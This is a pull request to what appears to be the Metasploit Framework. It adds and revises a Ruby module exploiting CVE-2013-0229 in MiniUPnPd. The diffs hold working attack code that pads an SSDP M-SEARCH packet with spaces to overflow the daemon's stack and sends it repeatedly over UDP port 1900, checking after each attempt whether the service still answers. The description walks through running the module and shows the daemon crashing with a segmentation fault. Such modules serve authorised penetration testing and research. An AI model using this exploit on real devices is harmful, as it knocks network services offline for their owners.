### PR TITLE
Added CVE-2013-0229 for MiniUPnPd < 1.4

### DIFF
--- a/modules/auxiliary/dos/upnp/miniupnpd_dos.rb
+++ b/modules/auxiliary/dos/upnp/miniupnpd_dos.rb
@@ -14,48 +14,92 @@ class Metasploit3 < Msf::Auxiliary
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'						=>	'MiniUPnPd 1.4 Denial of Service (DoS) Exploit',
-			'Description'		 =>
-				%q{
+			'Name'           => 'MiniUPnPd 1.4 Denial of Service (DoS) Exploit',
+			'Description'    => %q{
 					This module allows remote attackers to cause a denial of service in MiniUPnP 1.0
-					server via specifically crafted UDP request.
-				},
-			'Author'					=> [ 'Dejan Lukan' ],
-			'License'				 => MSF_LICENSE,
-			'References'			=> [
-				[ 'CVE', '2013-0229' ],
-				[ 'OSVDB', '89625' ],
-			],
-			'DisclosureDate'	 => 'Mar 27 2013',
+				server via specifically crafted UDP request.
+			},
+			'Author'         =>
+				[
+					'hdm', # Vulnerability discovery
+					'Dejan Lukan' # Metasploit module
+				],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					[ 'CVE', '2013-0229' ],
+					[ 'OSVDB', '89625' ],
+					[ 'BID', '57607' ],
+					[ 'URL', 'https://community.rapid7.com/servlet/JiveServlet/download/2150-1-16596/SecurityFlawsUPnP.pdf' ]
+				],
+			'DisclosureDate' => 'Mar 27 2013',
 		))
 
 		register_options(
 		[
 			Opt::RPORT(1900),
+			OptInt.new('ATTEMPTS', [true, 'Max number of attempts to DoS the remote MiniUPnP ending', 3 ])
 		], self.class)
 	end
 
+	def send_probe(udp_sock, probe)
+		udp_sock.put(probe)
+		data = udp_sock.recvfrom
+		if data and not data[0].empty?
+			return data[0]
+		else
+			return nil
+		end
+	end
+
 	def run
-		# connect to the UDP port
-		connect_udp
+		msearch_probe = "M-SEARCH * HTTP/1.1\r\n"
+		msearch_probe << "Host:239.255.255.250:1900\r\n"
+		msearch_probe << "ST:upnp:rootdevice\r\n"
+		msearch_probe << "Man:\"ssdp:discover\"\r\n"
+		msearch_probe << "MX:3\r\n"
+		msearch_probe << "\r\n"
 
 		# the M-SEARCH packet that is being read line by line: there shouldn't be CRLF after the
 		# ST line
-		sploit = "M-SEARCH * HTTP/1.1\r\n"\
-			"HOST: 239.255.255.250:1900\r\n"\
-			"ST:uuid:schemas:device:MX:3"
-
+		sploit = "M-SEARCH * HTTP/1.1\r\n"
+		sploit << "HOST: 239.255.255.250:1900\r\n"
+		sploit << "ST:uuid:schemas:device:MX:3"
 		# the packet can be at most 1500 bytes long, so add appropriate number of ' ' or '\t'
 		# this makes the DoS exploit more probable, since we're occupying the stack with arbitrary
 		# characters: there's more chance that the the program will run off the stack.
 		sploit += ' '*(1500-sploit.length)
 
-		# send the exploit to the target
-		print_status("Sending malformed packet to #{rhost}...")
-		udp_sock.put(sploit)
 
-		# disconnect from the server
-		print_status("The target should be unresponsive now...")
+		# connect to the UDP port
+		connect_udp
+
+		print_status("#{rhost}:#{rport} - Checking UPnP...")
+		response = send_probe(udp_sock, msearch_probe)
+		if response.nil?
+			print_error("#{rhost}:#{rport} - UPnP end not found")
+			disconnect_udp
+			return
+		end
+
+		(1..datastore['ATTEMPTS']).each { |attempt|
+			print_status("#{rhost}:#{rport} - UPnP DoS attempt #{attempt}...")
+
+			# send the exploit to the target
+			print_status("#{rhost}:#{rport} - Sending malformed packet...")
+			udp_sock.put(sploit)
+
+			print_status("#{rhost}:#{rport} - The target should be unresponsive now...")
+			response = send_probe(udp_sock, msearch_probe)
+			if response.nil?
+				print_good("#{rhost}:#{rport} - UPnP unresponsive")
+				disconnect_udp
+				return
+			else
+				print_status("#{rhost}:#{rport} - UPnP is responsive still")
+			end
+		}
+
 		disconnect_udp
 	end
 end

--- a/modules/auxiliary/dos/upnp/miniupnpd_dos.rb
+++ b/modules/auxiliary/dos/upnp/miniupnpd_dos.rb
@@ -22,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary
 				},
 			'Author'					=> [ 'Dejan Lukan' ],
 			'License'				 => MSF_LICENSE,
-			'Version'				 => '$Revision: 9999 $',
 			'References'			=> [
 				[ 'CVE', '2013-0229' ],
 				[ 'OSVDB', '89625' ],
@@ -60,26 +59,3 @@ class Metasploit3 < Msf::Auxiliary
 		disconnect_udp
 	end
 end
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-

--- a/modules/auxiliary/dos/upnp/miniupnpd_dos.rb
+++ b/modules/auxiliary/dos/upnp/miniupnpd_dos.rb
@@ -14,12 +14,11 @@ class Metasploit3 < Msf::Auxiliary
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'						=>	'MiniUPnPd < 1,4 denial of service (DoS) exploit',
+			'Name'						=>	'MiniUPnPd 1.4 Denial of Service (DoS) Exploit',
 			'Description'		 =>
 				%q{
 					This module allows remote attackers to cause a denial of service in MiniUPnP 1.0
-					server via specifically crafted UDP request. This vulnerability was identified
-					as CVE-2013-0229.
+					server via specifically crafted UDP request.
 				},
 			'Author'					=> [ 'Dejan Lukan' ],
 			'License'				 => MSF_LICENSE,
@@ -28,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary
 				[ 'CVE', '2013-0229' ],
 				[ 'OSVDB', '89625' ],
 			],
-			'DisclosureData'	 => 'Mar 27 2013',
+			'DisclosureDate'	 => 'Mar 27 2013',
 		))
 
 		register_options(

--- a/modules/auxiliary/dos/upnp/miniupnpd_dos.rb
+++ b/modules/auxiliary/dos/upnp/miniupnpd_dos.rb
@@ -53,6 +53,7 @@ class Metasploit3 < Msf::Auxiliary
 	end
 
 	def run
+    # the M-SEARCH probe packet that tries to identify whether the service is up or not
 		msearch_probe = "M-SEARCH * HTTP/1.1\r\n"
 		msearch_probe << "Host:239.255.255.250:1900\r\n"
 		msearch_probe << "ST:upnp:rootdevice\r\n"
@@ -89,6 +90,7 @@ class Metasploit3 < Msf::Auxiliary
 			print_status("#{rhost}:#{rport} - Sending malformed packet...")
 			udp_sock.put(sploit)
 
+      # send the probe to the target
 			print_status("#{rhost}:#{rport} - The target should be unresponsive now...")
 			response = send_probe(udp_sock, msearch_probe)
 			if response.nil?

--- a/modules/exploits/multi/upnp/miniupnpd_dos.rb
+++ b/modules/exploits/multi/upnp/miniupnpd_dos.rb
@@ -1,0 +1,86 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#	 http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::Udp
+	include Msf::Auxiliary::Dos
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'						=>	'MiniUPnPd < 1,4 denial of service (DoS) exploit',
+			'Description'		 =>
+				%q{
+					This module allows remote attackers to cause a denial of service in MiniUPnP 1.0
+					server via specifically crafted UDP request. This vulnerability was identified
+					as CVE-2013-0229.
+				},
+			'Author'					=> [ 'Dejan Lukan' ],
+			'License'				 => MSF_LICENSE,
+			'Version'				 => '$Revision: 9999 $',
+			'References'			=> [
+				[ 'CVE', '2013-0229' ],
+				[ 'OSVDB', '89625' ],
+			],
+			'DisclosureData'	 => 'Mar 27 2013',
+		))
+
+		register_options(
+		[
+			Opt::RPORT(1900),
+		], self.class)
+	end
+
+	def run
+		# connect to the UDP port
+		connect_udp
+
+		# the M-SEARCH packet that is being read line by line: there shouldn't be CRLF after the
+		# ST line
+		sploit = "M-SEARCH * HTTP/1.1\r\n"\
+			"HOST: 239.255.255.250:1900\r\n"\
+			"ST:uuid:schemas:device:MX:3"
+
+		# the packet can be at most 1500 bytes long, so add appropriate number of ' ' or '\t'
+		# this makes the DoS exploit more probable, since we're occupying the stack with arbitrary
+		# characters: there's more chance that the the program will run off the stack.
+		sploit += ' '*(1500-sploit.length)
+
+		# send the exploit to the target
+		print_status("Sending malformed packet to #{rhost}...")
+		udp_sock.put(sploit)
+
+		# disconnect from the server
+		print_status("The target should be unresponsive now...")
+		disconnect_udp
+	end
+end
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+


### PR DESCRIPTION
MiniUPnPd DoS PoC

We could describe the same steps to run the MiniUPnPd daemon and make it to listen to incoming connections, but we already did this in the previous PoC. This is why, we'll only provide the settings we need to cause DoS on the remote device. We should start the MiniUPnPd daemon the same way as before:

> miniupnpd -f miniupnpd.conf -d
> Reading configuration from file miniupnpd.conf
> miniupnpd[24934]: HTTP listening on port 8080
> miniupnpd[24934]: HTTP connection from 192.168.1.3:15955
> miniupnpd[24934]: HTTP REQUEST : GET /rootDesc.xml (HTTP/1.1)
> miniupnpd[24934]: HTTP connection from 192.168.1.4:56240
> miniupnpd[24934]: HTTP REQUEST : GET /rootDesc.xml (HTTP/1.1)

In the DoS exploit, the following options are available:

> msf > use exploit/multi/upnp/miniupnpd_dos
> msf  auxiliary(upnp2) > show options
> msf auxiliary(miniupnpd_dos) > show options
> Module options (auxiliary/multi/upnp/miniupnpd_dos):
> 
>   Name   Current Setting  Required  Description
> ---
> 
>    RHOST                   yes       The target address
>    RPORT  1900             yes       The target port
> 
> msf auxiliary(miniupnpd_dos) > set RHOST 192.168.1.2
> RHOST => 192.168.1.2
> msf auxiliary(miniupnpd_dos) > exploit
> 
> [_] Sending malformed packet to 192.168.1.2...
> [_] The target should be unresponsive now...
> [*] Auxiliary module execution completed

When sending the exploit to the target, the exploit will cause the MiniUPnPd daemon to terminate as seen below:

> Segmentation fault (core dumped)

We can see that we've successfully cause the denial of service of the MiniUPnPd deamon.
